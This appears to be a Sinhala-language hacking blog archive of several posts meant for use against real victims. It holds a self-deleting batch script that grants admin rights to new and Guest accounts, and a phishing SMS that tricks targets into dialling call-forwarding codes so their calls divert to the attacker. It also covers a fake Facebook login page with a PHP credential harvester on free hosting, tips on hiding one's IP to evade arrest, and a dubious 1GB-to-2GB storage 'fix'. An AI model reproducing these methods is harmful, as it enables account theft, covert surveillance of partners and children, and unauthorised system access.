Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Friday, April 11, 2014

How to Hack Computer Administrator Password

ADMINISTRATOR HACK කරමුද ?



මුලින්ම Notepad එක open කර ගන්න. මේ Codes ටික Copy & Paste කරන්න Note Pad එකට.

echo off
title Please wait...
cls
net user add Username Password /add
 net user localgroup Administrators Username /add
 net user Guest 420 /active:yes
 net localgroup Guests Guest /DELETE
 net localgroup Administrators Guest /add
 del %0 

දැන් ඉතින් අපේ වැඩේ ඉවරයි... අන්තිමට කරන්න තියෙන්නේ පරිස්සමට මේක Save කරන්න විතරයි. Guest2admin.bat කියලා ගහලා සේව් කරගන්න. 

ඊට පස්සේ ඔයාට Hack කරන්න ඕනේ පරිගණකයට මේක අරන් ගිහින් Run කරන්න.

Saturday, February 8, 2014

1GB Pen or SD Card Change to 2GB In Free

1GB Pen එකක් හරි SD Card එකක් 2GB වලට නෝමිලේ මාරුකරමු..

මේක මට හම්බවුනේ මම නිකන් GOOGLE එකේ ගහලා බැලුවා සිංහලේන් කෝහෝමද කියලා 1GB Pen එකක් 2GB කරන්නේ කියලා එත කෝට තමයි මට මෙක හම් බු උනේ ඉතින් මම එ පෝස්ට් එකම පෝඩි පෝඩි එඩිටින් ටිකක් දලා කමයි මෙක මේ ලියන්නේ.හරි හරි  දැන් අපි වැඩෙට බහිමුකෝ

දැන් ඉතින් මොකද්ද මේ කියන තුරු  ඉවසිල්ලක් නැතුව ඇති.?

1GB Fix 2GB කියල පොඩි සොෆ්ට්වයා එකක් තමයි. හමුවුනේ ඉතින් මේක Download කරන් බැලුවාම මේකෙන් පොඩි චාන්ස් එකක් ගන්න පුලුවන් 1GB SD Card එකක් හෝ 1 GB Pen එකක් මේකෙන් 2 GB බවට හරව ගන්න පුලුවන්

මම නම් ටෙස්ට් කලේ SD card එකක්  බඩු එල කිරි වගේ වැඩ තිබුන වගේම තමයි. වෙනසකට උනේ 2GB වුන එක විතරයි.

මට 1 GB  pen එකක් නෑ අනිවාරන් මේක pen +sd card දෙකටම වැඩ වැරදිලාවත් 2gb_4gb මේවට කරන්න යන්න එපා එහෙම වුනොත් 4gb 2gb වෙයි. හොදේ…


මෙන්න එහෙනම් මෙතනින් download කර ගන්න මම ඔක දේන්නේ අරකේ ලින්ක් එකේන්මයි.එකේ එයාලගේම Password එකක් ඇති. ඔය Rar file එක ඇතුලෙම ඇත..

http://adf.ly/YzyqR
 දැන් software එක Run කරන්න දැන් ඕන කරන usb drives එක පරිගණකයට සම්බන්ධ කර Fix කියන එක දෙන්න.දැන් මේ වගේ එකක් එයි  දැන් ok කරන්න
 


මේ වගේ එකක් එයි.


 please re-plugin this card again  වැටෙයි. දැන් තියෙන්නෙ ආයෙමත් pen එක ගලවලා පරිගණකයට සම්බන්ධ කරන්න.බලන්න properties 1GB 2GB වෙලා ඇති කොහොමද? 

ඒක නෙවේ මෙච්චර වටින ඒව දීලත් නිකම්ම යන එක  
හරිනෑ නේද ? අඩුම තරමෙ Comment එකක් like එකක් වත් දාගෙන යන්න…


ඔයාලා හිතන්න එපා මම අරකේ මුලු ලිපියම කෝපි කරා කියලා එකේන් කෝපි කරලා මගේ වඩන වලින් එඩිට් කරලා දුන්නේ හෝදේ... 

What a Password Cracking.?

                          මොකක්ද මේ Password Cracking?


 ඔන්න යලුවනේ මම ඔයාලට ගෝඩක් කාලේකින්නේ ඔන්න මම ගේනවා පෝඩි ලිපි කැල්ලක් ඔයාලා එක කියවලාම ඉන්කෝ.මෝකද වැඩි කතා බහක් හෝද නැතිලු. ඔක්කොටම කලින් password එකක් හොයාගන්න කරන සාමාන්‍යයෙන් යොදාගන්නා ප්‍රාථමිකම මට්ටමේ ක්‍රම විධි පිලිබඳ සලකා බලමු.

1. Social Engineering:

තමා තුල තබා ඇති විශ්වාෂය ප්‍රයෝජනයට ගනිමින් (හෝ විශ්වාසයක් ගොඩනගා ගනිමින්) password ලබා ගැනීම මෙසේ හදුන්වයි.

2. Shoulder surfing:

මෙහිදී කරන්නෙ password එක type කරන අවස්ථාවක එය නිරීක්ශනය කර එය ලබාගැනීමයි.

3. Guessing:

දුර්වල password එකක් යොදා ඇති අවස්ථාවක එය ඉතා පහසුවෙන් නිශ්චය කිරීම මින් අදහස්වේ.
දැන් මං මුලින්ම කතා කරන්නෙ Dictionary Attack එක ගැනයි.

Dictionary Attack:

මේකෙදි වෙන්නෙ dictionary එකේ (ඒ කියන්නෙ එදිනෙදා භාවිත වෙන වචන) සියලුම වචන ගලපල password එක crack කරන එකයි. (A dictionary attack is when a text file full of commonly used passwords, or a list of every word from the dictionary is used against a password database.)
හැබැයි මේ ක්‍රමයෙන් strong password එකකට නම් බලපෑමක් ඇති වෙන්නෙ නෑ. කොහොමද හොඳ ආරක්ශිත password එකක් (strong password එකක්) හදාගන්නෙ කියල දන්නෙ නැති අයට මං ඒ ගැන පස්සෙ post එකක් දාන්නම්. මේක බලපාන්නෙ, සාමාන්‍ය එදිනෙදා වචන තම password එක හැටියට තියාගන්න අයටයි.

මේ ක්‍රමය, ඒ කියන්නෙ dictionary attack එකක් වඩා සාර්ථක කරගන්න ක්‍රම දෙකක් තියෙනව.

පලමු ක්‍රමය වන්නේ ඉතා හොඳ දත්ත විශාල ප්‍රමාණයකින් යුක්ත dictionary එකක් භාවිතා කිරීම. එහමත් නැති නම් dictionary කිහිපයක් භාවිත කිරීම. විශේෂයෙන්ම විවිධ භාෂා වලින් යුක්ත dictionary කිහිපයක් භවිතා කල හැකියි.

දෙවෙනි ක්‍රමය වන්නේ මෙම ක්‍රමය සමගම සම වචනය සමගම ඊට නිතර භාවිත වන අනිකුත් අකුරු සංඛ්‍යා සහ සංකේත ගලපමින් සහ එය යෙදිය හැකි විවිධ ආකාර වලින් යොදා බලමින් උත්සාහ කිරීමයි.
උදාහරණයක් විදිහට කියනවනම් password එක "password" යැයි සලකා බලන අවස්ථාවේ ඊට, pAssw0rd, drowssap, Password වැනි යෙදිය හැකි සියලු ආකාරවලින්ද ගලපා බැලීමයි.
මේකත් ටිකක් වෙලා යන වැඩක්...

ඊලඟට Rainbow Tables ගැන කතා කරමු..



Rainbow Tables:

Rainbow Table එකක් කියන්නෙ සියලුම අකුරු, සංඛ්‍යා හා සියලු සංකේත ගැලපිය හැකි සියලු ආකාරයට ගලපමින් සකසා ගත්තු list එකක්(ඇත්තෙන්ම කියනව නම් hash values list එකක්.).
(A Rainbow table is a huge pre-computed list of hash values for every possible combination of characters.)











Password hash කියල අපි හදුන්වන්නෙ mathematical algorithm එකකක් මගින් හදුනාගත නොහැකි රටාවකට පරිවර්තනය කරගත් password එකකටයි. A hash is a one way encryption. ඒ කියන්නෙ hash එකක් නැවත orginal string එක බවට පරිවර්ථනය කල නොහැකියි.
Database එකක ආරක්ෂාකාරීව password store කරන්න හුඟක්ම භාවිත කරන hashing algorithm එක වන්නේ MD5ය.

මෙහිදී අපි එවැනි website එකකට register වෙන අවස්ථාවක අපි enter කරන password එක MD5 Algorithm එක හරහා එන hash value එක තමයි database එකේ store කරන්නෙ.

උදාහරනයක් විදිහට මම password එක විදිහට "hello" කියල enter කලහම MD5 algorithm එක හරහා database එකේ store කරන password එක "fea0f1f6fede90bd0a925b4194deac11" වැන්නකි. ඉතින් මෙවැනි යෙදිය හැකි සියලුම ආකාරයෙ hash values සහිත Rainbow table එකක් Brute force attack එකකට වඩා පහසුවෙන් password එකක් crack කරගැනීම සඳහා යොදා ගත හැක.
                                                                                                                                උපුටා ගැනිම්ක්..

Saturday, February 1, 2014

Go You Hutch Sim To Free Internet And Safe for All Time...

Hutch වලින් free internet යන හැටි හා අනෙක් Network වල intenet speed එක වැඩි කරගන්නා හැටි

Hutch වලින් free internet යන හැටි හා අනෙක් Network වල intenet speed එක වැඩි කරගන්නා හැටි.මේ දවස් වල facebook එකේයි ලංකාවෙ තියෙන අනෙක් social networks වලත් ජයටම Hutch free unlimited internet දෙනවා කිය කිය software කැල්ලක් දහස් ගනං වලට විකුනනවා. හරියට විරයො වගේ එ කට්ට්ය හදපු software එකක් වගෙයි එ කට්ටිය එක විකුනන්නෙ. වෙන කොහෙන්වත් එක හොයා ගන්නත් බැරිලු. ඒ අස්සෙ ඔය software කැල්ලත් එක්ක virus පුරොවලා කට්ටියට download කරගන්නත් දෙනවා. හොද එවුන් දහස් ගානක් ඉන්න ලංකාවේ එකෙක් දෙකෙක් කරන මේ ජරා වැඩෙන් බෙරිලා කිසිම software එකක් නැතිව තව සිමිත කාලයකට hutch වලින් free internet යන්නත් පුලුවන් විදිහක් ගැන අපි බලමු. අනෙක් network වලින් internet යන කට්ටියට මෙ ක්‍රමයෙන් internet speed එක වැඩි කරගන්න පුලුවන්.

ඉස්සේල්ලම ඔය දහස් ගනන් වලට විරයෝ වගේ විකුනන Software කැල්ල ගැන කියලා ඉමුකෝ.එකේ නම තමයි UltraSurf එක ලොකයේ ප්‍රසිද්ධ පොඩි Anti-Censorship Software එකක්.ඔන කෙනේක්ට මම ඔය යට දාලාතියෙන් Download Butten එක ඔබලා එ කට ගෝහින් බාගන්න පුලුවන්.
http://adf.ly/cxgVR




 hutch වලින් free internet යන්න ඔනේ නම්. hutch sim එක තියෙන dongle එක connect කරලා download කරගත්ත file එක unzip කරපුවාම තියන ultrasurf software කැල්ල doubleclick කරලා open කරන්න ඉට පස්සේ ultrasurf network එකට connect වෙනකම් ඉන්න. connect උනාට පස්සෙ ඇතිතරමක් තව සිමිත කාලයකට නොමිලේ hutch වලින් internet යන්න.

youtube එකේන් උපුටා ගත් ultrasurf   එක ගැන tutorial එකක්



Wednesday, January 29, 2014

Hacking Black Track Belt

         හක්කරන්න Black Track(හැක් කරන්න කලුපටි ගහගන්න)


  හලෝ යාලුවනේ කස්ටියටම ඉතින් කොහොමද.....අදත් ඉතින් මම වෙනදා ගෙනවා වගේ හැක්කරන්න පෝඩි සෝෆ්ට් කැල්ලක් ගෙනාවා කස්ටියටම දැන ගන්න...

මං හිතන්නේ නම් ගොඩක් අය මේ ගැන දන්නවා ඇති.... අලුතෙන් කියලා කියන්න ඕනේ නෑනේ...
ඒත් පොඩි හැදින්වීමක් දෙන්නම් මම....මේ ඇවිල්ලා Opensource වින්ඩෝස් වගේ එකක්.... නමුත් වින්ඩෝස් වලට වඩා ගොඩක් වෙනස් මෙහෙයුම් පද්දතියක්..... හරියට අල්ල ගන්න නම් ඉතින් ටික කාලයක් යනවා.Opensource වල ගොඩක් වර්ග තියෙනවා.... Linux,Ubuntu,Fedora,Kubuntu,Redhat(hacking),Backtrack(hacking) වගේ දේවල්..තව තියෙනවා ටිකක් කියුවාම ඇතිනේ......ඉතින් මන් දැන් දෙන්න යන එකේ කරන්න තියෙන වඩ ටිකක් වෙනස්....
මෙහෙම කියුවොත්..අපේ උන් ඉන්නවනේ හැකින් කියුවොත් කන එක පවා දාලා එන උන් කියලා...
අන්න ඒ අයටයි..... අනිත් අයටයි තමා මේක දෙන්නේ......
අනන් මනන් කරන්නේ නැතුව අලුත් දෙයක් ඉගෙන ගන්න තියෙනව නම් කොච්චර දෙයක්ද නේද....
Opensource වලින් කරන්න බැරි දෙයක් නෑ මචංලා..මගේ නැති උන Files ඔක්කොම Ubuntu වලින් ගන්න පුලුවන් උනා...ඒ දෙවල් කර ගත්තේ දැනගෙන නෙවේ......... නමුත් දැන් නම් අව්ලක් නෑ....ඉතින් දන්න දේවල් කියල දෙන්නත් ඕනනේ...මගේ නෑනේ ලොකු සීන්.ඒත් සමහර අය නම් එහෙම හිතන් ඉන්නවා...දන්නෝ දනිති......මම දෙන්නම් පහලින් Backtrack කියන OS එකේ අලුත්ම සංස්කරණය...හිමීට බාන්න ටොරන්ට් ලින්ක් දෙන්නම්....

මෙන්න අරමං කියපු පොඩි සොෆ්ට් එක ගන්න එහෙනම්....



                                                                    Torrent File



Direct Download BT5 (64bit ISO)
Direct Download-BT5 (32bit ISO)
Direct Download BT5 R2 (32bit ISO)
Direct Download BT5R2 (64bt ISO)


More Torrent Downloads (තව දුරටත් ඩවුන්ලොඩ් කරගන්න)

BT 32Bit
BT 64Bit

එහෙනම් මම ගියා තවත් දෙයකින් හමු වෙමු.....!!!!

Saturday, January 4, 2014

Telephone Call Hack.For Pishing

         මෙන්න මෙහෙමයි Telephone Call Hack කරන්නේ..


දන්නා නොදන්නා ඕනෑම අයෙකුගේ ජංගම දුරකතන අංකය ආශ්‍රයෙන් ඒ ඒ පුද්ගලයින්ගේ දුරකතන ඇමතුම් වලට සවන් දියහැකි ක්‍රමවේදයකි.

  • ආයුබෝවන් යාලුවෝ හැමදෙනාටම කලබල නැතුව මුල ඉඳලා අගට යනකන්ම මේක කියවලාම වැඩේට බහින්න. ඉතින් මම මේ ඔයාලට කියලා දෙන්න යන්නෙ කොහොමද කෙනෙක්ගෙ දුරකතන අංකය භාවිතා කරලා ඒ කෙනාගෙ දුරකතන ඇමතුම් වලට සවන් දෙන්නෙ කියලා. මම මේ දේ කියල දෙන්න යන්නෙ කාටවත් නරකක් කරන්න නෙවෙයි.තමන් ආදරය කරන කෙනා තව කෙනෙක් එක්ක Phone එකෙන් කතා කරනවද කියලා සැකනම්, තමන්ගෙ දුව-පුතා කවුරු එක්කද Phone එකෙන් කතා කරන්නෙ කියලා දැනගන්න ඕනිනම් ඒ දේවල් දැනගන්න.ඒක නිසා මේ දේ කවුරුවත් වැරදි විදියට පාවිච්චි කරන එකක් නැහැ කියල මම බලාපොරොත්තු වෙනවා. මම මේ දේවල් පිලිබඳ කිසිඳු වගකීමක් බාරනොගන්නා බවද කියන්න කැමතියි.


 ---අපි වැඩේ පටන්ගමු.---

හැඳින්වීම :

  •  ඕනෑම කෙනෙකුට මෙය අත්හදා බැලිය හැක.එනම් පහසු ක්‍රියාවලියකි.
  •  SMS පහසුකම සහිත ඕනෑම දුරකතනයක් මෙම ක්‍රමයෙන්  Hack කිරීමට පුලුවන්.(සමහර ලංකාබෙල්, සිටිලින්ක් දුරකතන හැර...)
  •  (Phishing හා සමාන ක්‍රමවේදයකි.)

අවශ්‍යය දේවල් :
  • අලුත්ම Gmail Account එකක්
      (උදා :- dialoglanka@gmail.com , srilankamobitel@gmail.com වගේ එකක්.ඒක ඔයාලා Hack කරන්න යන කෙනාගෙ ජංගම දුරකතන ජාලය අනුව,ඊට උචිත නමකින් හදාගන්න..)
  • අලුත්ම සිම් කාඩ් පතක්(සිම් එක ගන්න ඕනෙ Hack කරන්න යන කෙනාගෙ ජංගම දුරකතන ජාලයේ සිම් එකක්මයි)
ඔක්කොම දේවල් දැන් අපි ලෑස්ති කරගෙන තමයි තියෙන්නෙ.
මම දැන් පියවරෙන් පියවර කියල දෙන්නම්.
  • ඉස්සෙල්ලම ඔයා හදපු Gmail Account එකට Log වෙන්න.
  • ඊට පස්සෙ ඔයා Hack කරන්න යන කෙනාගෙ Phone Number එක Contact List එකට දාගන්න.
  • දැන් ඒ කෙනාට SMS යවන Window එක Open කරගෙන මේ පහලින් පෙන්නලා තියන විදියට මොනව හරි Type කරගන්න

 උදා :-
 @dialog.adata niyamitha 
apage sanwathsarika
semarum hethuwen
"30mins" kaalayak onema jalayakata
amathum nomile labadheemata
api katayuthu yodha athi bawa
sathutin danwamu.me sandaha 
pahatha keathaya amathaa liyaapadinchi wanna
 "*******************"
 ____________________
දැන් මම ඔය තරු ටිකක් දාල තියන තැන Type කරන්න තියනවා අංකයක්.පහල තියන අංක 4න් ඕනෑම අංකයක් එතනට දාන්න පුලුවන්.එතකොට වෙන දේවල් ටිකත් මම ඒ එක්කම දාල ඇති.ඒක බලපුවහම කට්ටියට තේරෙයි මොකද වෙල තියෙන්නෙ කියලා.
මම "X" දාලා තියන තැන් වලට ඔයාලා අරගත්ත සිම් එකේ Number එක ලියන්න.

**62*XXXXXXXXXX#
මේ අංකය දැම්මොත් ඒ කෙනා Phone එක OFF කරපුවහමයි, Signal නැති වෙලාවටයි එයාගෙ Phone එකට එන සේරම calls එන්නෙ ඔයා අර දාපු Number එකට.
  **61*XXXXXXXXXX#
මේ අංකය දැම්මොත් ඒ කෙනා Phone එක Answer කරන්නෙ නැති වෙලාවට ඒ Calls සේරම එන්නෙ ඔයා අර දාපු Number එකට.
  **67*XXXXXXXXXX#
මේ අංකය දැම්මොත් ඒ කෙනා Call එකක ඉන්න වෙලාවට ඒ Calls සේරම එන්නෙ ඔයා අර දාපු Number එකට.
  **21*XXXXXXXXXX#
මේක දැම්මොත් ඒ කෙනාට එන සේරම Calls එන්නෙ ඔයා අර දාපු Number එකට.
හැබැයි මේකනම් එච්චර සාර්ථක නැහැ.පටස් ගාලා අහුවෙන්න පුලුවන්.ඔයාලටම තෙරෙයි ඒ ඇයි කියලා.
Number එක මෙන්න මේ විදියට දාන්න මතක තියා ගන්න.වෙන වෙන විදියට ගහන්න එපා.
උදා :-

"0712345678"
දැන් මේ SMS එක ඒ කෙනාට යවන්න.ඒ කෙනා මේ Code Number එක Dial කරපු සැනින් ඔයා යවපු  Code Number එකේ හැටියට සේරම Calls හැරෙනවා.මේක හැම Phone එකකටම වෙනසක් නැතුව වැඩ කරනවා.ඕනෙම Phone එකකට.
 
කියන්න අමතක උනා මෙවා අයින් කරගන්න යට Code එක ගහන්න 
##002#
මේක සාමාන්‍යය Phone එකකිනුත් කරන්න පුලුවන්.ඒත් එහෙම සාමාන්‍යය Number එකකින් SMS එකක් ආවට ඒක කවුරුවත් ගනන් ගන්නෙ නැහැ.ඒක නිසයි අපි Gmail Use කලේ.එතකොට SMS එක යන්නෙ "12323" වගෙ අංක 5ක Number එකකින්.ඒ වගෙම අපි අලුතින් Gmail Account එකක් හැදුවෙ අපේ Gmail Address එකත් SMS එකේ යටින් වැටෙන නිසා.
එහෙනම් යාලුවෝ හැමෝම මේක Try කරල බලන්න.
කාටවත් නරකක් කරන්න නෙවෙයි.යමක් ඉගෙනගන්න.

Thursday, January 2, 2014

Send a Fake E-mail From any Email Address ...Awesome

             මෙන්න මෙහේමයි හොර ඊ-මෙයිල් එකක් යවන්නේ


      හරි ‍‍ඹයාලා ඹක්කෝටම සුබම සුබ දවසක්.‍ඉතින් මට කාලේකින් Blog එක පැත්තේ එන්න හිතුනා.මට හරිම හරි සතුටු දවසක් අද.මට ඹයාලට කියන්න බැරි තරම් සතුටුයි.මෝකද කියනවනම් මගේ Blog එක ගැන.ඹයාලට කියන්න මට මේ Blog එක ගැන ආපු Mail එක මාර සින් එකක් තියේන්නේ. :P.ලෝල්.ඉහි... ඉහි... ඉහි...මේ වීඩියෝ එක බැලුවට පස්සෙ සමහර විට ඔයාලටත් මේ වගේ අවස්ථා හිමිවෙන්න ඉඩ තියෙනවා. ඒ නිසා බලාපොරොත්තු කඩ කරගන්න එපා.

මම අද වැඩිය කතා කරන්න බලාපොරොත්තු වෙන්නෙ නෑ.ම පහලින් වීඩියෝ එක දාන්නම් ඒක බලලම කමෙන්ට් කරන්න.මම හිතන්නෙ මේ ලිපිය කියවලා වීඩියෝ එක බලපු හැමෝටම හොඳ හොඳ දේවල් හිතට එයි. ඒත් ඒ හැඟීම් පාලනය කරගන්න බලන්න. ඔන්න එහෙනම් මම පහලින් වීඩියෝ එක දානවා ඒක බලලා ඉන්නකෝ.



මම හිතන්නෙ සමහර විට මේක ඔබට වැදගත් වෙන්න ඇති. වැදගත් උනා නම් හිතට හැඟිම් කමෙන්ට් එකකින් දාලා මගේ බ්ලොග් එකට Follow පාරක් දාන්න. එහෙනම් මම ගියා. ආයේ සෙට් වෙයිද කියන්න බෑ...:P



Wednesday, January 1, 2014

Unlock You All Brand Dongle.Its Esy

                   ඔයාගේ Dongle එක Unlock කරමුද.?.!!! 

 


හරි ඉතින් ඹයාලා ඹක්කෝටම සුබ දවසක්.කෝහෝමද ඉතින් ඹයාලට.මන් අද ඹයාලට දෙන්න යන්නේ හුගාක් වටින දේයක් .හැබැයි මේදේ වටින්නේ Internet Dongle (Dialog,Etisalat,Hutch,Airtel,) වාගේ Dongle පාවිච්චි කරන අයට.ඒ කියුවවේ සමහර අය පාවිච්චි කරන Dongle Unlock නැ නේද.?.එහේම නේද.? .ඔව් අද මන් ඹයාලට දේන්න යන්නේ එකට විසදුමක්.ඹයාලට කරන්න තියේන්නේ පෝඩි දේයයි.මම යටින් දාන Link එකේන් ඹයාලා එක Download කරගේන ඉන්නකෝ... :D.


http://www.mediafire.com/?bua5mrjc80le2h8

හරි දැන් Download වුනායින් පස්සේ ඹයාලට හම්බු වේන්නේ ZIP File එකක්.එක දැන් ඔයාලා Extrack කරගේන Open කරන්න .ඉට පස්සේ එක Open කරයින් පස්සේ තියේනවා Select manufacturer කියලා .එතනට ඹයාලගේ Dongle එකේ වර්ගය තෝරන්න.ඉට පස්සේ මේන්න Select model
 මේතනට Dongle එකේ Model අංකය තෝරන්න.ඊට පස්සේ දකුණු පැත්තේන් තියේනවා Unlocking කියලා Tab එකක්. එකට ගිහින් Unlock කියන Butten එක Click කරන්න.දැන් ටික වේලාවක් ඉන්න.(විනාඩි 5 ක් වගේ) .දැන් ඉතින් ගින්දර වගේ ඔන Sim එකක් දාන්න පුලුවන් .: -D .නියමයි නේ.

එහේනම් මම තවත් දවසක තවත් Post එකකින් සේට් වේන්නම්.ගැටලු මොනවා හරි තියෙනවා නම් කමෙන්ට් කරන්න.එහෙනම් අදට මම ගියා. ආයෙත් හමුවෙමු... ජය ශ්‍රී

Saturday, December 7, 2013

One Shot Facebook Account Hack..

          එක පාරින්ම Facebook Account එකක් හැක්කරමු.....

 

හැක් කරන්න දගලන මල්ලිලා නංගිලා බලයි මූට පිස්සුද කියලා.. ඇයි ඉතින් කරන්න  හැම දේම කරත් වැඩේ කචල්මනේ...

අද කියල දෙන්නම්  PHISHING වලින් හැක් කරන්නේ  කියලා ..බයිල ගහනවා වැඩිද මන්ද.. :D  කෙලින්ම වැඩේට බහිමු..!!
   
   අපි කරන්නෙ යන්නෙ මේකයි.Facebook විදියටම බොරු Log-in page එකක් හදලා.ඒක Internet එකේ Host කරන්න. ඊට පස්සෙ අපිට ඕන අයව ඒකට යැව්වහම එයාලගේ Username password අපිට Text එකක් විදියට ලැබෙනව.ඉතින් Facebook Username password තිබ්බහම අපිට එයාලගේ Profile එකට ලේසියෙන්ම යන්න පුලුවන්නෙ.ඔන්න ඕකයි දැන් මම කියල දෙන්න යන්නෙ.මම නම් මේ ක්‍රමේට වඩා පොඩ්ඩක් විතර වෙනස් ක්‍රමයකින් තමයි මේක කරන්නෙ.ඒ කියන්නෙ මම ‍Text file එක වෙනුවට පාවිච්චි කරන්නෙ Database එකක්.එතකොට Username password යන්නෙ මගේ Database එකට.ඒ ක්‍රමේ චුට්ටක් විතර අමාරුයි.ඒ නිසා මම හිතුව ලේසි ක්‍රමේ කියල දෙන්න.මේන්න තියෙනව කරන හැටි.

01.ඉස්සෙල්ලම html page එකයි php script එකයි  Download කරගන්න.


http://www.webtricksblog.com/wp-content/uploads/2011/04/fake-facebook.zip

02. ඒ Download කරපු Zip File එකේ ඇති Html file හා php file එක එකම Folder එකකට ගන්න.Html file එක index1 කියල තමා ඇත්තෙ.ඒක index කියල Rename කරන්න.

03.හරි දැන් තියෙන්නෙ මේක Host කරන්න.මේකටම කියල ඔයාලට සල්ලි ගෙවල web space එකක් ගන්න බෑනේ.ඒ නිසා ‍නොමිලේ දෙන සේවාවක සහය ගන්න වෙනව.මේ තියෙන්නෙ ඒ වගේ නොමිලේ web space එකක් එක්කම Domain දෙන වෙබ් අඩවි දෙකක්.

www.110mb.com
www.000webhost.com

මේ දෙකින් එකකට ගිහින් register වෙන්න.ඊට පස්සෙ ඔයාලට Free domain එකකුත් ලැබේවි.උදාහරණයක් විදියට www.srifb.site88.com. ඊට පස්සෙ ඔයාල Download කරගත්ත File දෙක Site එකට Upload කරන්න.

04. දැන් ඔයාලගේ Site එක මේ විදියට පෙනේවි.




දැන් අපිට පුලුවන් මේක හරියටම වැඩ කරනවද කියල Check කරල බලන්න.ඒක කරන්නෙ මෙහෙමයි.ඔයාල හැදුව Site එකට ගිහින් Email,Password ඇතුල් කලාම ආපහු Original Facebook Page එකටම ඔයාලව Redirect වෙයි.දැන් ඔයාල File  Upload  කරපු තැනට ගිහින් බලන්න.එතන passes.txt File එකක් තියේවි.ඒක ඇතුලට ගියාම ඔයාලට දැකගන්න පුලුවන් වෙයි ඔයාල ඇතුල් කරපු Email එකයි Password එකයි.

(ගැටලුවක් තිබුනොත් අපිව දැනුවත් කරන්න Comment,Facebook,Skype
Facebook:www.facbook.com/uweenisirindu1

Skype:uween.isirindu)

වැඩේ එළකිරි වගේ ප්‍රථිපල දෙයි..!! බ්ලොග් එකෙට like පාරකුයි fallow පාරකුයි දුන්නොත් ඒක මට ලොකු හයියක්.comment එකකුත් දාලම යන්න එහෙනම්

Hacking Study Lesson ...

                         හැක් කරන්න ඉගෙන ගන්න 

 

  ආධුනික හැකර් කෙනෙකු අනිවාර්යයෙන්ම දැන ගත යුතු මූලිකම කරුනු  !!!
සුබ දවසක් කට්ටිය ඔක්කොටම ඔන්න . . . . .!!
හුග දවසකින් පොස්ට් එකක් ලියන්න හිතුන.
අද පොස්ට් එක ලියන්නේ fb hack  කරන්න අසාවෙන් ඉන්න අය සඳහායි...!!

කස්ටියට hack කරන්න කියල දෙන්නම් කිව්වම ඇඟපත නිකන් මෙව්වා මෙව්වා වෙනවා නේ ???

අපි කවුරුත් දන්න විදිහට හැක් කරනවා කියන එක නීති විරෝධී වැඩක්...මාට්ටු උනත් කේස් ෆයිල් වෙනවා..ඒත් ලංකාවේ පුරවැසියෙක් විදිහට මම බොහෙම ආඩම්බරෙන් කියනවා අනිත් රටවල් වල තරම් දරුනු සයිබර් නීති ලංකාවේ නෑ...ඒ කියන්නේ ෆේස්බුක් ගිනුමක් හැක් කරා කියලා හිරේ දාන්න තරම් තාම අපේ නීතිය දියුනු වෙලා නෑ...ඒත් ඉතින් පේ පැල් ගිනුමකට වත් ගේම දීලා මාට්ටු උනොත් නම් ඉතින් සොරිම තමා...

හොදයි දැන් කොහොමද අපි මාට්ටු නොවෙන්ඩ වැඩ කරන්නේ?

මෙහෙමයි...මුලින්ම අපි මේ විදිහේ සයිබර් අපරාධයකට හවුල් උනොත් අපිව අල්ලගන්න තියන ප්‍රධානම සාක්ෂිය මෙකක්ද?...ඒ තමා අපි කවුරුත් දන්න IP Adress එක
ඉතින් අපි අහු නොවෙන්ඩ නම් ඉස්ඉස්සෙල්ලාම අපේ ඇත්ත IP Adress එක හංගලා වෙන IP Adress එකකින් අන්තර්ජාලයට සම්බන්ද වෙන්න වෙනවා..ඉතින් ඒකට අවශ්‍ය වෙන්නේ බොහෙම සුලු මෘදුකාංගයක්....නම Real Hide IP
ඒක මෙතනින් නොමිලේම බාගන්න පුලුවන්..(patch එකත් අන්තර්ගතයි)

හරි දැන් ඒක බාගෙන patch කරගන්න.දැන් ඒ මෘදුකාංගය පාවිච්චි කරලා අපිට වෙන වෙන රටවල් වල විදිහට අන්තර්ජාලය භාවිතා කරන්න පුලුවන්...හැබැයි ඔයාගේ අන්තර්ජාල වේගය පොඩ්ඩක් අඩුවෙයි...

කවුරු හරි කෙනෙක් ඉන්නවනම් ඒ මෘදුකාංගය භාවිතා කරන්න අකමැති එයාට පුලුවන් වෙන ක්‍රමයක් භාවිත කරන්න.ඒ තමා Hidemyass වෙබ් අඩවිය භාවිත කිරීම.
ඒකෙදී මුලින්ම මේ වෙබ් අඩවියට යන්න
www.hidemyass.com
දැන් තමන්ට කැමති රටක් තෝරලා අවශ්‍ය වෙබ් අඩවියට යන්න පුලුවන්.ඒත් ඒ වෙබ් අඩවිය ඇතුලෙම තමා අපිට ඕනේ වෙබ් අඩවිය ලෝඩ් වෙන්නෙත්.ඉතින් අර මෘදුකාංගය භාවිතා කරන එක වඩාත් ඵලදායී.

හොදයි දැන් ඔන්න ඔයාව අල්ලන්න තියන ඉඩ කඩ බොහොම සීමිතයි...හැබැයි ලොකු ලොකු ගේම් දෙන්න ගිහින් පොට වරද්දගන්න එපා...මොකද වෙන රටවල ඉන්නවා හැකර්ලව අල්ලන්නත් හැකර්ලා...අපි මොන සුකුරුත්තම් දාලා හිටියත් උන්ට අපිව අල්ලන එක බොහොම සුලු දෙයක්..

තව දෙයක්....හිතන්න අපිට ඕනේ ෆේස්බුක් ගිනුමක් හැක් කරන්න..අපි හැක් කරන්න පටන් ගද්දිම කරන්නේ මොකක්ද?යනවා ගූගල් එකට..hack facebook account , facebook hacker වගේ දෙයක් ගහලා සර්ච් කරනවා...
එතකොට මොකද වෙන්නේ කිව්වොත්....අපිට හම්බ වෙනවා විවිධාකාරයේ සෙෆ්ට්වෙයා මහා ගොඩාරියක්.....
උදාහරන කිව්වොත්
Facebook Hacker Pro , Pro Facebook Hack,Facebook Password Recovery,Facebook Hacker,Facebook Password Stealer,Pirates Facebook Hack
වගේ ඕනතරම් සොෆ්ට්වෙයා මහ ගොඩක් එනවා...මේ හැම එකකම අපෙන් ඉල්ලන්නේ එකම වගේ දේවල්...අපිට හැක් කරන්න ඕන facebook account එකේ account ID , facebook account එකේ email එක වගේ දේවල් ඉල්ලනවා...ඒ කරලා ඒවා දුන්නම හැක් කරලා දෙනව කියලත් කියනවා...
ඉතින් අපි මේවා දුන්නම එයාල අපිට කියනවා ෆේස්බුක් ගිනුම සාර්ථකව හැක් කරා..පාස්වර්ඩ් එක ලබා ගන්න නම් සොෆ්ට්වෙයා එක ඇක්ටිව් කරන්න කියලා...හැබැයි මේක ඇක්ටිව් කරන්න යම්කිසි ගානක් ගෙවලා තමා activation code එක ලබා ගත යුත්තේ....
